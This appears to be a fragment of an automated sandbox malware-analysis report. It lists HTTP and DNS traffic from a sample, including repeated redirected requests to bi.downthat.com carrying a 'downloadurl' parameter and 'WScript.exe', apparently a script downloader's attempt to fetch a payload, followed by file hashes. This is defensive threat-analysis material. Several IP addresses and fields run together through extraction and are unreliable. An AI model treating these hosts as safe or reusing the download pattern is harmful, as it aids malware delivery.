GET https://www.bing.com/aes/c.gif?RG=16c3a93125b949fd8d962a034bccd1ce&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240508T112332Z&adUnitId=11730597&localId=w:F93159F4-8ABC-3E2B-DF73-50B998F17BEB&deviceId=6825829378917981HTTP Response
200 -
88.221.83.184:443https://www.bing.com/th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90tls, http21.6kB 6.4kB 16 12
HTTP Request
GET https://www.bing.com/th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90HTTP Response
200 -
3.130.253.23:80http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=httpWScript.exe691 B 283 B 6 3
HTTP Request
GET http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=HTTP Response
302 -
3.130.253.23:80http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=httpWScript.exe691 B 283 B 6 3
HTTP Request
GET http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=HTTP Response
302 -
3.130.253.23:80http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=httpWScript.exe691 B 283 B 6 3
HTTP Request
GET http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=HTTP Response
302 -
3.130.253.23:80http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=httpWScript.exe691 B 283 B 6 3
HTTP Request
GET http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=HTTP Response
302 -
204.79.197.200:443https://tse1.mm.bing.net/th?id=OADD2.10239360931609_1JAA48IJSET6WWQHH&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90tls, http230.5kB 883.0kB 645 641
HTTP Request
GET https://tse1.mm.bing.net/th?id=OADD2.10239360931610_110BPTPDN41GIXK2B&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90HTTP Request
GET https://tse1.mm.bing.net/th?id=OADD2.10239360931609_1JAA48IJSET6WWQHH&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90HTTP Response
200HTTP Response
200 -
1.2kB 8.1kB 16 13
-
66 B 90 B 1 1
DNS Request
8.8.8.8.in-addr.arpa
-
60 B 139 B 1 1
DNS Request
www.djapp.info
-
61 B 191 B 1 1
DNS Request
bi.downthat.com
DNS Response
3.130.253.233.130.204.160
-
65 B 113 B 1 1
DNS Request
www.hugedomains.com
DNS Response
172.67.70.191104.26.7.37104.26.6.37
-
73 B 159 B 1 1
DNS Request
228.249.119.40.in-addr.arpa
-
71 B 133 B 1 1
DNS Request
23.253.130.3.in-addr.arpa
-
56 B 151 B 1 1
DNS Request
g.bing.com
DNS Response
204.79.197.23713.107.21.237
-
74 B 128 B 1 1
DNS Request
172.210.232.199.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
72.32.126.40.in-addr.arpa
-
73 B 143 B 1 1
DNS Request
237.197.79.204.in-addr.arpa
-
72 B 137 B 1 1
DNS Request
184.83.221.88.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
43.58.199.20.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
13.86.106.20.in-addr.arpa
-
120 B 278 B 2 2
DNS Request
www.djapp.info
DNS Request
www.djapp.info
-
60 B 139 B 1 1
DNS Request
www.djapp.info
-
70 B 144 B 1 1
DNS Request
86.23.85.13.in-addr.arpa
-
71 B 145 B 1 1
DNS Request
206.23.85.13.in-addr.arpa
-
60 B 139 B 1 1
DNS Request
www.djapp.info
-
60 B 139 B 1 1
DNS Request
www.djapp.info
-
71 B 135 B 1 1
DNS Request
240.197.17.2.in-addr.arpa
-
71 B 135 B 1 1
DNS Request
249.197.17.2.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
29.243.111.52.in-addr.arpa
-
62 B 173 B 1 1
DNS Request
tse1.mm.bing.net
DNS Response
204.79.197.20013.107.21.200
-
73 B 106 B 1 1
DNS Request
200.197.79.204.in-addr.arpa
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD53813cab188d1de6f92f8b82c2059991b
SHA14807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb
SHA256a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e
SHA51283b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76